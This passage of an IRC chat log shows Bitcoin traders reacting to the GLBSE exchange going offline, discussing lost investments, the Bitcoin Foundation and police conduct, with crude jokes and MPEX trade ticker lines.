weekly. Oct 05 02:20:42 26% per year, semi-high credit card rate. Oct 05 02:21:25 BTC-Mining: I put up a loan on btcjam, still being funded Oct 05 02:21:35 I'm glad I didn't do a LTO or fund on GLBSE Oct 05 02:21:40 I hedged glbse with litecoinglobal lol Oct 05 02:21:54 feelsgoodman.jpg Oct 05 02:22:52 anything worth noting on ltc-global? Oct 05 02:23:06 i haven't bought/invested litecoins yet Oct 05 02:23:09 only mined and traded Oct 05 02:23:21 i've "invested" 3 coins in pyramining (read: i was drunk). break-even in 13 months. yea. sure. call me maybe Oct 05 02:23:22 for one thing you can buy shares in the exchange itself lol Oct 05 02:24:02 noagendamarket: like mpex? Oct 05 02:24:03 lol Oct 05 02:24:21 bitcoin investing is closely related to flushung the toilet Oct 05 02:24:46 explain Oct 05 02:24:52 or sitting on top of a skyscraper and thrpowing $5 notes off it Oct 05 02:25:05 Eh, I had ~18000 USD in assets on GLBSE + 3460 USD loaned through BTC-BOND + ~20000 USD through BTC-MINING Oct 05 02:25:15 ouch Oct 05 02:25:16 maybe some mpex user finds this useful http://pastebin.com/raw.php?i=jtuEzGbv Oct 05 02:25:27 mpex is for porn lol Oct 05 02:25:43 I have BitVPS shares on MPEx Oct 05 02:25:56 Delicious hosting shares Oct 05 02:26:04 noagendamarket: you can make money investing bitcoins Oct 05 02:26:22 yes I trade the spread :P Oct 05 02:26:29 that's fun to Oct 05 02:26:32 especially for turds Oct 05 02:26:37 yah Oct 05 02:26:38 i think mpex is actually pretty interesting. i dont care about the domain, porn and alleged child pr0n. but the fee spoils it for me atm Oct 05 02:26:55 free spoils? Oct 05 02:26:58 yeah thew mpex fee ius a huge barrier Oct 05 02:27:10 boonies4u, -r Oct 05 02:27:12 oh fee spoils Oct 05 02:27:17 Considering I started with 7000 USD/900 BTC and ended up with 18000 USD/1500 BTC in value, I'd say trading was good until GLBSE went offline. Oct 05 02:27:34 :) Oct 05 02:27:44 I hope it comes back online... or i'm gonna have to buy an FPGA Oct 05 02:27:50 and I can't daytrade FPGAs Oct 05 02:27:51 BTC-Mining was one of the better assets Oct 05 02:28:09 3460 USD loaned through BTC-BOND + ~20000 USD through BTC-MINING I'll need the list of holders to return anything back. Oct 05 02:28:37 I only have a few bonds lying around Oct 05 02:28:41 The problem is that 20000 USD + about ~10000 USD of my 18k was in BTC-MINING Oct 05 02:28:55 I liquidated most of my personal shares a week ago Oct 05 02:28:55 and Amazingrando from Bitbond has those funds loaned to. Oct 05 02:29:05 nice Oct 05 02:29:21 I suspected this was coming Oct 05 02:29:26 He can return them, but without a list of BTC-MINING holders, I cannot return anything. Oct 05 02:29:49 hopefully nefario doesn't kill himself or vanish Oct 05 02:29:53 why seems everybody to be so anti-cryptostocks? besides the fact i've only found two assets that i'd out money in Oct 05 02:30:02 Its funny that BTC-Mining had value because it didnt actually own hardware yet lol Oct 05 02:30:04 out=put Oct 05 02:30:34 ie it was fully backed by the bitcoins it holds :D Oct 05 02:30:40 It had a loan with one of the large serious miner, with an agreement for that hashing paying the dividends to be repurchased back at 100% Oct 05 02:30:55 So we were making money while accumulating funds for FPGA/ASICs Oct 05 02:31:04 yah Oct 05 02:31:11 Without ever actually spending on equipment before seeing it working. Oct 05 02:31:22 We were getting ready. Oct 05 02:31:34 It was the largest pool of funds for the large ASIC rigs. Oct 05 02:31:36 its a good way to do it Oct 05 02:31:41 We almost had enough for one. Oct 05 02:31:42 don't act so negative Oct 05 02:31:53 nefario could turn back around and damage control could go quite smoothly Oct 05 02:32:14 So far I'm confident GLBSE will come back or a list of holders will be released. Oct 05 02:32:29 I'm not really worrying too much. Oct 05 02:32:41 I dodged a bullet Oct 05 02:32:51 boonies4u, stop being rational and spread more FUD! ;) Oct 05 02:33:09 eh, if GLBSE come back and everyone panic sells... Oct 05 02:33:12 drekk: where's mpex and realsolid? Oct 05 02:33:21 I actually like nefario Oct 05 02:33:22 I think I'll own a large portion of every assets. Oct 05 02:33:45 The SEC cant repossess greyhounds lol Oct 05 02:33:55 lol Oct 05 02:34:06 ftw Oct 05 02:34:21 if it's a list, it needs to be a signed list of bitcoin addresses linked to holdings Oct 05 02:34:47 I wouldnt accept the code thing nefario is pushing Oct 05 02:34:53 no way Oct 05 02:35:11 BTC address or jump off a bridge Oct 05 02:35:15 has to be gpg signed messages if anything. Oct 05 02:35:19 yep Oct 05 02:35:35 so if any scammers or trolls confront, you can link to the transactions Oct 05 02:35:38 Nefario should provide a way to submit a BTC address to be given to OPs Oct 05 02:35:46 with the signed document as source Oct 05 02:36:07 Then we can claim/transact with the OP through signing with said BTC address/receiving payments there. Oct 05 02:37:05 beh... Oct 05 02:37:35 here's to hoping glbse comes back up Oct 05 02:37:39 and not some "list" Oct 05 02:37:47 lets hope so Oct 05 02:38:12 with a decent PR person ;p Oct 05 02:38:31 cant afford it lol Oct 05 02:38:47 Nefario takes all the profit :P Oct 05 02:39:05 :( Oct 05 02:39:18 he should write a book to fund the PR position Oct 05 02:39:25 "How to ruin a business in minutes" Oct 05 02:39:36 what exactly did he "do"? Oct 05 02:39:54 I've only heard 2nd hand snippets from usagi Oct 05 02:39:55 delisted something in a terrible fashion Oct 05 02:40:09 he delisted goat Oct 05 02:40:24 and gave him a broken redemption scheme Oct 05 02:40:55 then took the site down with this as the lead sentence on the parked page "For those worried about their bitcoin, please calm yourselves there has been no hack and your coins are safe and all accounted for." Oct 05 02:41:13 Don't worry I didn't pull a bitcoinic@40 guys ROFLMAO Oct 05 02:41:36 I bet that makes you guys feel all warm and fuzzy, I R GR8 @ PR Oct 05 02:42:55 noagendamarket, the scary thing is that Nefario has used better systems in the past. So it appears from the outside that he was looking to hose over Goat. Oct 05 02:43:14 so he delisted goat and shut down the site? Oct 05 02:43:24 sounds silly, not necessarily damaging Oct 05 02:43:29 there was time between the two actions Oct 05 02:43:37 The thing with GLBSE compared to trading platforms is that most put funds, buy some stocks, and the ops spends it outside GLBSE. Oct 05 02:44:00 So there's far from the whole assets' value at any time in GLBSE's wallet. Oct 05 02:44:15 GLBSE doesnt hold much btc Oct 05 02:44:31 its simply a trading platform, Oct 05 02:44:31 I hardly see it profitable to just steal that even if it's a good few thousands BTC over going long term with GLBSE seriously. Oct 05 02:44:33 ok, so no one knows why the page was put up? Oct 05 02:44:42 that's to be expected, on a USD exchange the exchange doesn't horde the funds Oct 05 02:44:57 You would have to be a very lousy and lazy thief to go away with just GLBSE's wallet. Oct 05 02:45:00 nefario wants to go regulated but others dont :P Oct 05 02:45:12 there has been no official reasoning, just that park page. boonies4u Oct 05 02:45:21 scary Oct 05 02:45:29 My guess is SEC/FSA clawing back because of Pirate Oct 05 02:45:33 [MPEX] [S.MPOE] 10000 @ 0.00036266 = 3.6266 BTC [+] Oct 05 02:45:34 [MPEX] [S.MPOE] 25458 @ 0.00036267 = 9.2329 BTC [+] Oct 05 02:45:35 [MPEX] [S.MPOE] 13542 @ 0.00036461 = 4.9375 BTC [+] Oct 05 02:45:47 if I were him, I would have just put up a bogus maintenance page Oct 05 02:45:52 would have gone so much smoother Oct 05 02:45:58 or he screwed the rolling out of GLBSE v.3 and he's now in panic mode trying to make it work. Oct 05 02:46:16 boonies, quite... Oct 05 02:46:30 is GLBSE v3 the one with actually functioning blue,white,pink, and black markets? Oct 05 02:46:37 People would all have gone cheering with expectations about a shiney GLBSE v3 Oct 05 02:47:06 then he could say it was just normal maintenance, and that they shouldn't have overreacted Oct 05 02:47:37 we need a live ticker on the number of hairs on nefario's head Oct 05 02:47:54 I would easily see this happening: after the weekend, Nefario comes back, looks at all the talks and would be something like: "What the heck? I put a notice not to panic! Look at the shiny new v3!" Oct 05 02:48:26 damn out of popcorn! Oct 05 02:48:47 this could be a good chance to buy stocks from panic sellers Oct 05 02:48:51 after it goes back up Oct 05 02:49:07 Big enough asa1024? Oct 05 02:49:23 lol Oct 05 02:49:26 actually I have popcorn... >3> Oct 05 02:49:28 >:3 Oct 05 02:49:32 >;D Oct 05 02:50:08 pirate says the SEC havent contacted him Oct 05 02:50:35 Really? Oct 05 02:50:48 *take with mountain of salt Oct 05 02:50:58 Odd... maybe they're so slow they haven't even yet figured who this "Pirateat40" is. Oct 05 02:50:58 but yes, he said he hasn't been served with any papers yet Oct 05 02:51:10 well they are slow Oct 05 02:51:28 we know that from the post-Madoff review Oct 05 02:51:33 They probably starting to have a bigger picture of what happened and info about the passthrough issuers. Oct 05 02:51:38 my guess is they are in the public information gathering stage Oct 05 02:51:43 And will have to get Pirate's identity through them. Oct 05 02:51:47 to assess whether more action is needed Oct 05 02:52:10 I wondered why nefario asked what does the red button do the other day :P Oct 05 02:53:07 noagendamarket, lol Oct 05 02:54:18 pirate already said he's in no physical danger Oct 05 02:54:26 he already has his pirate island Oct 05 02:54:48 I want my own island Oct 05 02:55:10 you can make one out of plastic bottles Oct 05 02:55:39 though it would be more attractive to use the plastic balls made out recycled materials Oct 05 02:55:51 but I just gave up coke, no more bottles for me Oct 05 02:56:00 True, plastic bottles degrade slowly. And are full of air. Perfect material for a cheap fleating island. Oct 05 02:56:30 bitcoinbear: lol Oct 05 02:56:38 what about tea, water, sun drop? Oct 05 02:57:04 bitcoiners dont do shit when you rip them, off...so people rip them off Oct 05 02:57:17 sad but true Oct 05 02:57:18 actually, the other day I was contemplating stealing one of the islands in Lake Michigan Oct 05 02:57:26 stealing? Oct 05 02:57:31 you mean squatting? Oct 05 02:57:38 how long would it take people to notice me way out there? Oct 05 02:57:50 people break in to houses inn Australia because no one has guns and you can sue the house owner if you break a leg while stealing from them Oct 05 02:58:13 no, stealing, making my own country Oct 05 02:58:40 new Red Dwarf season Ep 1 is out Oct 05 02:59:09 bitcoinbear: I guess it depends on if border patrol boats go near it or not Oct 05 02:59:40 you could make a nice little border jumping hub Oct 05 02:59:44 no border on lake michigan, until I declare one Oct 05 03:00:31 I think the lakota indians seceeded again didnt they ? Oct 05 03:00:34 but yes, I have seen coast gaurd out there Oct 05 03:01:27 Make a tribe with your own language, never educate the kids about any word of english. If the first generation dies along with english before you are discovered, the next ones when discovered would be a completly non-english speaking, oblivious to technology, tribe of people from american descent... Oct 05 03:02:06 It would make things interesting at least. Oct 05 03:04:32 why must they be oblivious to tech? Oct 05 03:04:42 ..and call it "hobo land" Oct 05 03:04:54 lol Oct 05 03:05:21 sounds like WACO Oct 05 03:05:24 make bitcoin the official curreny ofthe tribe Oct 05 03:05:31 lol Oct 05 03:05:39 banana coins Oct 05 03:05:49 I don't bitcoin to be an official currency by a country Oct 05 03:06:01 it would remove the voluntary nature of bitcoin Oct 05 03:06:11 is it still bitcoin if you change the name of the client ? Oct 05 03:06:12 don't want* Oct 05 03:06:23 noagendamarket: what is this I don't even Oct 05 03:06:41 just search and replace all uses of the word bitcoin lol Oct 05 03:07:35 I don't care about the voluntary nature of bitcoins, I care about the lack of centralization. Oct 05 03:08:15 The lead dev being in charge of the bitcoin foundation doesnt help :P Oct 05 03:08:46 noagendamarket: oh hush Oct 05 03:09:26 noagendamarket: this is what I have a problem with http://www.forbes.com/sites/jonmatonis/2012/10/04/bitcoin-prevents-monetary-tyranny/ Oct 05 03:09:37 The network is pretty safe as long as the majority don't adopt a code release with centralizing features Oct 05 03:10:06 boonies4u why ? Oct 05 03:10:28 meh. think the bigger problem is centralization of PR/visibility to the outside Oct 05 03:10:33 boonies4u, you mean you have a problem with monetary tyranny, correct? Oct 05 03:10:40 [MPEX] [F.GIGA.ETF] 2297 @ 0.00039785 = 0.9139 BTC [-] Oct 05 03:10:41 [MPEX] [S.MPOE] 31700 @ 0.00036127 = 11.4523 BTC [-] Oct 05 03:11:20 RogueAI: I have a problem with an organization politicizing bitcoin, which would be essentially throwing non-anonymous members and bitcoiners under the bus Oct 05 03:11:45 putting up articles like that is what will get us declared as terrorists Oct 05 03:12:28 well it's from forbes Oct 05 03:12:46 I once made the mistake of reading an issue at a laundromat Oct 05 03:13:03 it's a Forbes article by Jon Matonis Oct 05 03:13:18 what a dirty rag of a media company Oct 05 03:13:54 I don't doubt that there are plenty of idiot people out there who won't understand that no one can speak for a inanimate trading unit Oct 05 03:14:05 yeah I wont be joining the foundation :P Oct 05 03:14:14 Jon Matonis, a founder of TBF, https://bitcoinfoundation.org/about/board Oct 05 03:14:20 noagendamarket: it's probably too late for me Oct 05 03:14:25 maybe you should start seeding "John Matis is an idiot" around the internet Oct 05 03:14:38 Jon Matonis works for Visa Oct 05 03:15:20 he used to Oct 05 03:15:22 "Centralised. Here we are with the worlds most powerful distributed system with countless possibilities for expansion and yet we keep building an infrastructure with centralised components like we're still living in the dot com boom and practically every damn attack has been against centralised components." https://bitcointalk.org/index.php?topic=115430.msg1246227#msg1246227 ;) Oct 05 03:15:39 My career has included senior influential posts at Sumitomo Bank, VISA, VeriSign, and Hushmail. Oct 05 03:15:54 ok that Jon Matonis bio is giving me creepy feelings about Gavin's past CIA talk Oct 05 03:16:09 I don't want TBF to lead bitcoin to either extreme Oct 05 03:16:13 payment processors, SSL Cert issuer, and a supposedly secure email service Oct 05 03:16:13 I don Oct 05 03:16:41 I don't want bitcoin to become centralized or regulated, but I also don't want it to be labeled as a tool to be used against the state Oct 05 03:16:44 that has the scent of intelligence asset all ove rit Oct 05 03:16:47 over it* Oct 05 03:17:03 why did they let this guy be a founder? Oct 05 03:17:18 only makes me wonder how compromised any other founders are Oct 05 03:17:20 its not a tool to take down the state its a tool against bankers :P Oct 05 03:17:48 that's just as bad Oct 05 03:17:51 well "bad" Oct 05 03:18:10 yea probably Oct 05 03:18:24 imo, the mantra for BTC should be "medium of exchange for the internet" Oct 05 03:18:31 nothing political Oct 05 03:18:35 maybe I should set up a dead man's switch Oct 05 03:18:47 incase I disappear, certain people are informed Oct 05 03:18:54 bitcoin is justa tool you can use :P Oct 05 03:19:18 tool is a bad word Oct 05 03:19:23 medium of exchange is better Oct 05 03:19:29 sure Oct 05 03:20:05 there should be more bitcoin-otc and less mt gox :P Oct 05 03:20:17 oh yes definitely Oct 05 03:20:21 how about "virtual game currency" Oct 05 03:20:37 PeanutPower: we need more games that use it ingame Oct 05 03:20:46 I think one or two does Oct 05 03:20:50 I dislike agreeing with Atlas but I'm just going to ignore that foundation Oct 05 03:20:54 i'm working on that :P from an LTC perspective :) Oct 05 03:21:17 it would be nice if the devs were more interested in faster confirmations from the core network Oct 05 03:21:23 RogueAI: Atlas is the reason why my post counts go up by 50 in 4 hours Oct 05 03:21:24 rather than wanting bitcoin banks to form Oct 05 03:21:43 i like the 2.5 min confirmation time with litecoin Oct 05 03:21:53 i like litecoin, because it's still around Oct 05 03:21:54 :P Oct 05 03:22:08 yeah i like litecoin Oct 05 03:22:18 less politics in litecoin too :) mostly devs right Oct 05 03:22:19 and Matonis doesnt use it lol Oct 05 03:23:00 PeanutPower: I'm getting viewers of http://www.imthorrbo.com to mine litecoins Oct 05 03:23:05 so I can use them to buy ads for thorrbo Oct 05 03:23:17 how can something like btc/ltc be "not political"? even the statement "p2p over centralisation" is a political one Oct 05 03:23:19 if they shut down bitcoin we just start a new blockchain LOL Oct 05 03:23:35 drekk: bitcoin is political... but saying it is political is suicide Oct 05 03:23:41 the genie is out of the bottle Oct 05 03:23:50 boonies4u, i dont get that :P Oct 05 03:24:25 drekk: saying that you are user of bitcoin, and that bitcoin robs the state and the bankers of the power over money... in an non-anonymous setting Oct 05 03:24:32 is basically confessing to being a terrorist Oct 05 03:24:34 I dont want anyone getting a drone strike because Matonis writes an article about bitcoin Oct 05 03:24:43 ^ Oct 05 03:25:00 boonies4u: cool i'm working on a few experimental things over at ltcgaming.tk Oct 05 03:25:02 then again, they probably would miss the target anyways Oct 05 03:25:05 its far from subtle Oct 05 03:25:25 nothing playable yet though, just working on transaction processing, chat infrastructure stuff first Oct 05 03:25:34 I prefer the :art of war" method lol Oct 05 03:25:42 i guess you guys live on a higher paranoia level than i do :P Oct 05 03:25:48 haha Oct 05 03:26:06 look arou7nd you :P Oct 05 03:26:56 I stay away from the city now because they are now setting up "weapon free zones" and can struip search you in public basically Oct 05 03:27:14 where? Oct 05 03:27:20 Melbourne Oct 05 03:27:35 oh Oct 05 03:27:54 you should just surround the city with people with guns Oct 05 03:27:59 lol Oct 05 03:28:17 They recently went to the train station with cardboard "checkpoints" and searched people Oct 05 03:28:26 wtf Oct 05 03:28:29 creepy Oct 05 03:28:37 I took video of it lol Oct 05 03:28:50 pretty fucked up Oct 05 03:29:31 it's darkly hilarious that they are searching random people because if they specifically targeted suspected gang/mob members they would be actually putting themselves at risk to serve the community Oct 05 03:29:42 and of course the criminals would sue them using their ill gotten gains Oct 05 03:30:32 glad i'm in germany. a) we crash the few drones we have on own grounds - b) anti-terror harrasment is way more subtle - c) we keep buying foreign economies and therefore are doing ok, i guess Oct 05 03:30:51 aat occupy melbourne they rode horses into people. Oct 05 03:30:54 Germany is a bit werid Oct 05 03:30:56 weird Oct 05 03:31:05 hows that? Oct 05 03:31:11 now no one is allowed tpo protest here basuically Oct 05 03:31:15 balk at appearing too strong armed, a lot of the time but then they beat up protestors over a rail station Oct 05 03:31:30 all I know about germany is what I read from #agora Oct 05 03:31:30 over trees and a rail station location Oct 05 03:31:42 nearly blinded a guy Oct 05 03:32:03 but most of the time the authorities are pretty focused on appearing reasonable Oct 05 03:32:06 I got pushed into the road by a cop and charged with jaywalking lol Oct 05 03:32:28 Well, Australia is pretty close to America in personality imo Oct 05 03:32:36 at least euro descent americans Oct 05 03:32:39 RogueAI, true. police measurements during demonstrations have become pretty strong (but better documentated by smartphones as well) Oct 05 03:32:42 we are a lot worse in some ways Oct 05 03:32:51 also, the senior protestor from Stuttgart *was* blinded Oct 05 03:32:56 we have no bill of rights Oct 05 03:33:17 *lost one eye Oct 05 03:33:20 they can abduct you off the street and question you for days and youre not allowed to tell anyone Oct 05 03:33:28 I think it comes from both Australia and America being where the "less fit" of British society emigrated Oct 05 03:33:43 US has National Security Letters for that Oct 05 03:33:54 Can't talk about being told not to talk about what we did to you Oct 05 03:34:14 drekk, oh man he really did lose an eye Oct 05 03:34:15 wtf Oct 05 03:34:31 they couldn't just spend the money to save some trees? Oct 05 03:34:39 have to beat the crap out of their own citizens? Oct 05 03:34:43 we have the crime commission here :) Oct 05 03:35:07 Germany should take a queue from the US Oct 05 03:35:20 pretend to be negotiating then bulldoze it at night on a weekday Oct 05 03:35:24 Australians dont have any human rights written into the constitution Oct 05 03:35:46 not that it makes any difference Oct 05 03:35:52 [MPEX] [S.MPOE] 3100 @ 0.00036127 = 1.1199 BTC [-] Oct 05 03:35:54 [MPEX] [S.MPOE] 11500 @ 0.00036123 = 4.1541 BTC [-] Oct 05 03:35:55 [MPEX] [S.MPOE] 4200 @ 0.00036111 = 1.5167 BTC [-] Oct 05 03:36:02 well, noagendamarket, it's much more about how the judges and courts behave then having written rights Oct 05 03:36:19 trust me, having them written down does no good if the justice system is messed up Oct 05 03:36:25 yep. Oct 05 03:37:07 how did that jaywalking ticket turn out? Oct 05 03:37:14 did the court see it for being BS? Oct 05 03:38:19 if the cops beat people up on the streets people usually cheer them on here Oct 05 03:38:19 no0 one will step in to stop them Oct 05 03:38:43 :( Oct 05 03:38:51 i've never seen police brutality Oct 05 03:38:54 only done it Oct 05 03:38:55 jk Oct 05 03:38:55 RogueAI, 2:03 -> http://www.youtube.com/watch?v=bWicN1QLQCg Oct 05 03:39:01 I refusing to pay :P Oct 05 03:39:02 well you've one upped most US states in that regard Oct 05 03:39:24 because fuck them Oct 05 03:39:31 oh i see Oct 05 03:39:39 rg's not funny unless hes on his knees scooping up your kids puke Oct 05 03:39:41 jails here are like holiday camps lol Oct 05 03:39:48 I'd have a camera rolling 24/7 in town, if I was you Oct 05 03:39:54 EU jails have cable Oct 05 03:39:56 I do Oct 05 03:40:08 the cops broke it though Oct 05 03:41:01 now that I moved down to central florida, maybe I'll see interesting stuff Oct 05 03:41:11 best bet is to stay away from the city where its a lot worse Oct 05 03:41:17 other than a crane walking through the ditch on the ide of the road Oct 05 03:41:18 have it stream to a secure storage Oct 05 03:41:26 the cops here are fucked still Oct 05 03:42:24 one stopped my car and threw my keys into the bushes on the side of the road lol Oct 05 03:43:06 cos i wouldnt wind my window down fully Oct 05 03:43:13 haha Oct 05 03:44:11 I had to stop delivering pizzas cos they targeted me :P Oct 05 03:44:44 you gotta slow down Oct 05 03:44:45 silly Oct 05 03:44:49 haha Oct 05 03:45:08 I showed them...now Im fit from walking everywhere lol Oct 05 03:45:22 XD Oct 05 03:45:29 while they eat donuts and cant get their fat asses out of the station Oct 05 03:45:55 I getting fit for the zombie apocalypse Oct 05 03:46:54 why not just fly to madagascar? Oct 05 03:46:59 lol Oct 05 03:47:05 they only have one port, and they shut it down as soon as someone sneezes Oct 05 03:47:23 youre not allowed to leave the country without permission silly :P Oct 05 03:47:55 just sneak out, then ask for asylum Oct 05 03:47:57 cause of the zombies Oct 05 03:48:02 haha Oct 05 03:48:23 i actually used to like german cops. esp. for stuff like this: 2:18 -> http://www.youtube.com/watch?v=mmn0OzQHDo4 Oct 05 03:52:00 not bad Oct 05 03:52:49 its different when the police are corporatised and not actually employed by the government. Oct 05 03:53:34 they are slowly replacing the cops with "public service officers" Oct 05 03:53:48 yea thats reeaaaly creepy Oct 05 03:54:03 like they've already done with the military and corporations like blackwater Oct 05 03:54:24 exACTLY Oct 05 03:54:53 you mean academi Oct 05 03:55:00 of course. :D Oct 05 03:55:55 good (=scary) read: "blackwater" by jeremy scahill Oct 05 03:56:24 they sent 3500 uS tropps here recently Oct 05 03:56:30 *troops Oct 05 03:56:39 where are you? Oct 05 03:56:45 Australia Oct 05 03:56:49 ok Oct 05 03:56:54 noagendamarket: that's just us swinging our bid stick around Oct 05 03:56:56 big* Oct 05 03:57:16 "do another 'crocodile dundee'or else...' Oct 05 03:57:30 The last prime minister was getting too close to china so they brought in the economic hitmen and "replaced" him Oct 05 03:57:38 nice Oct 05 03:57:43 witha woman LOL Oct 05 03:58:04 she is a babe! Oct 05 03:58:09 she is a minority government and has never actually been voted in by the majority Oct 05 03:59:18 so at least she's clever. :P Oct 05 03:59:33 shes a corrupt ex lawyer lol Oct 05 03:59:52 need some brains to be successful with that ;) Oct 05 04:00:11 98% of politicians here are lawyers and doctoras Oct 05 04:00:20 *doctors Oct 05 04:00:53 same here. replace doctors with economists and... strange... people Oct 05 04:01:07 [MPEX] [S.MPOE] 8034 @ 0.00036111 = 2.9012 BTC [-] Oct 05 04:01:08 [MPEX] [S.MPOE] 5386 @ 0.00036092 = 1.9439 BTC [-] Oct 05 04:01:10 [MPEX] [S.MPOE] 11180 @ 0.00035988 = 4.0235 BTC [-] Oct 05 04:01:21 economists are just businessmen that never operated a business lol Oct 05 04:01:52 its like saying restaurant critics are chefs Oct 05 04:02:28 I wonder how long it would take Paul krugman to run a business into the ground :D Oct 05 04:03:29 or dank bank Oct 05 04:03:33 "We didnt have any customers so now is obviously a good time to increase production" Oct 05 04:03:37 lol Oct 05 04:04:11 or...g;bse ? Oct 05 04:04:22 bahaha Oct 05 04:05:43 The economy has dug itself into a hole so now is a good time to produce more shovels Oct 05 04:05:53 :D Oct 05 04:06:06 Its job creation :D Oct 05 04:06:14 you gotta out dig everyone else Oct 05 04:06:23 lol Oct 05 04:06:23 that way it collapses on them, not you Oct 05 04:06:36 sounds like the mining sector :P Oct 05 04:07:33 good night and spread the FUD! Oct 05 04:07:46 night Oct 05 04:08:14 noagendamarket: I don't calculate resell value into mining equipment Oct 05 04:08:20 it's far to delusional Oct 05 04:10:28 at least with gpu you can game with them Oct 05 04:11:19 not for long lol Oct 05 04:11:21 if youre buying them just to mine youre doing it wrong :D Oct 05 04:11:35 lol Oct 05 04:11:42 it's a little late for buying them to mine Oct 05 04:11:50 yep Oct 05 04:12:28 It saddens me that the only thing left on glbse is mining :( Oct 05 04:12:38 because wtf Oct 05 04:12:46 *checks glbse* Oct 05 04:12:50 hahah Oct 05 04:12:53 where's the mining? Oct 05 04:13:11 well there's obsi Oct 05 04:13:17 eww Oct 05 04:13:19 there's some other ponzi's Oct 05 04:13:32 some lower interest ponzi's Oct 05 04:13:41 theres mining ponzis too lol Oct 05 04:13:44 and there's gsdpt Oct 05 04:14:02 pick your poison Oct 05 04:14:08 I was gonna list an alpaca :P Oct 05 04:14:27 LOTTOMINING LOL Oct 05 04:14:33 alpaca's don't have enough etOH Oct 05 04:14:33 bahaha Oct 05 04:15:03 alpacas multiply by themselves unlike mining rigs lol Oct 05 04:15:25 eventually we will be able to print mining rigs Oct 05 04:15:52 cant leave a mining rig in a room and come back later and there is 5 more of them lol Oct 05 04:16:03 yet Oct 05 04:16:09 I suppose Oct 05 04:16:20 they cant print electronics yet Oct 05 04:16:58 we should mine in space Oct 05 04:17:14 expensive :D Oct 05 04:17:15 cooling is free, power is free Oct 05 04:17:34 noagendamarket: not as expensive to launch a rocket to get people to repair it Oct 05 04:17:35 just costs you 20 million to get there lol Oct 05 04:17:54 we need a spcae elevator Oct 05 04:18:00 *space Oct 05 04:18:08 nah, we need space colonies Oct 05 04:18:19 we probably already do :P Oct 05 04:18:26 nah Oct 05 04:18:30 too much rads Oct 05 04:19:01 nasa is developing warp drives Oct 05 04:19:21 what? Oct 05 04:19:27 its true :P Oct 05 04:19:32 how does that work? Oct 05 04:20:08 http://www.news.com.au/technology/sci-tech/visit-to-klingon-empire-could-happen-maybe/story-fn5fsgyc-1226478131345 Oct 05 04:20:11 lol Oct 05 04:20:36 a warp drive for a car! Oct 05 04:20:39 i like the eve online explanation Oct 05 04:21:08 in eve lore, you make a depleted vacuum around your ship Oct 05 04:21:18 which makes light go faster in it Oct 05 04:21:24 mk who hilited me ? Oct 05 04:21:24 which lets your ship go faster Oct 05 04:21:28 yes something like that Oct 05 04:22:07 ok, i'm back from lunch Oct 05 04:22:12 what'd i miss Oct 05 04:22:22 theres a looph9ole in physics that allows it Oct 05 04:23:12 a 7.5 hour lunch is not a bad lunch at all Oct 05 04:23:15 i feel like a king Oct 05 04:23:32 noagendamarket: usually a loophole in physics means Oct 05 04:23:34 lol. how many bjs in the 7.5 hours ? Oct 05 04:23:46 did you book it to your company expense account lol Oct 05 04:23:46 o.O I just noticed GLBSE is down, I feel I have missed the news Oct 05 04:23:49 it's not an actual exploitable loophole Oct 05 04:23:56 Azelphur: XD Oct 05 04:24:09 i'm inclined to respect my wife's wishes and not talk about the number or quality of bjs i receive at lunch Oct 05 04:24:10 GLBSE got swallowed by a space time paradox Oct 05 04:24:27 smickles: tell me though Oct 05 04:24:35 noagendamarket: haven't yet formed to company, it'll come within the week tho Oct 05 04:24:46 Azelphur lol you missed all the drama Oct 05 04:24:54 mircea_popescu: now I'm sad :( Oct 05 04:24:55 it must be your anniversary or birthday if your wife is ggiving bj's lol Oct 05 04:25:15 noagendamarket maybe it's her aniversary, and she's taking them Oct 05 04:25:22 drama is fun xD Oct 05 04:25:24 Azelphur: dude, last i know, glbse went down, news to come sat/sun, can't be good Oct 05 04:25:34 noagendamarket: i thought he was talking about bj's he receives from coworkers at lunch Oct 05 04:25:36 indeed \o/ Oct 05 04:25:36 not from her Oct 05 04:25:44 aah Oct 05 04:25:56 he must be hiring secretaries lol Oct 05 04:25:59 I wonder if it's the SEC Oct 05 04:26:15 Azelphur : I doubt it Oct 05 04:26:18 sec giving blow jobs to smickles? Oct 05 04:26:20 you think the sec wouldn't put up an sec webpage on glbse? Oct 05 04:26:23 the SEC is too busy lookig at porn Oct 05 04:26:29 smickles: *shrug* Oct 05 04:26:31 [MPEX] [S.MPOE] 13800 @ 0.00036386 = 5.0213 BTC [+] Oct 05 04:27:01 in that case they would be more interested in mpoe lol Oct 05 04:27:11 asa1024: i'd prefer to have as little interaction with the sec as possible, bjs included Oct 05 04:27:16 it contains all of their favourite things :P Oct 05 04:27:27 smickles i hear they're great @ anal action Oct 05 04:27:36 I am having so much bad luck with investments now lol Oct 05 04:28:05 Azelphur: an initial investor to SS should still have made 70%ish profit Oct 05 04:28:23 even if glbse shuts down (assuming we can identify shareholders Oct 05 04:28:24 smickles: true, if GLBSE ever comes up to get that money out, haha Oct 05 04:28:32 lol Oct 05 04:28:40 knowing my luck ;) Oct 05 04:28:51 Azelphur: SÂcm only has about a few hundred satoshi in glbse Oct 05 04:28:57 dividend payment leftovers Oct 05 04:29:02 glbse may come back but dont know how longer it will last Oct 05 04:29:09 yea, but you still need shareholder data xD Oct 05 04:29:18 at least not in its current form Oct 05 04:29:21 SEC dont call it a bj Oct 05 04:29:35 its a cockmeat sandwich Oct 05 04:29:55 ya know, upon consideration, i'd be afraid the SEC bj representitive would be a succubus Oct 05 04:30:07 bankers are men Oct 05 04:30:11 the only difference between btcjam and glbse is that glbse calls itself a stock exchange Oct 05 04:30:13 so it'd be an incubus Oct 05 04:30:24 btcjam? Oct 05 04:30:33 smickles: open lending market Oct 05 04:30:35 p2p lending Oct 05 04:30:37 ;;google btcjam Oct 05 04:30:37 (BTCJAM) 100 BTC Loan Request: ; Peer to Peer Bitcoin Lending - BTCJAM: ; Rules for borrowers - BTCJAM: Oct 05 04:30:45 hey Oct 05 04:30:46 that's me Oct 05 04:30:49 https://bitcointalk.org/index.php?topic=113582.0%3E Oct 05 04:30:53 they even have mining ops lol Oct 05 04:31:20 the only difference between btcjam and glbse is that glbse calls itself a stock exchange << lol srsly. Oct 05 04:32:15 well if anyone wants to loan me some coins https://btcjam.com/listings/38 Oct 05 04:32:25 btcjam also doesn't have an 8 btc listing cost Oct 05 04:32:31 just 1% on close Oct 05 04:32:32 yep Oct 05 04:33:00 what's the most anyone ever closed ? Oct 05 04:33:10 let me see Oct 05 04:33:55 I dont know the operator so use at your own risk lol Oct 05 04:34:29 http://www.youtube.com/watch?v=DcZ9UwF-kv8 Oct 05 04:34:35 noagendamarket: yeah, well, if the operator bounces, people are going to have a 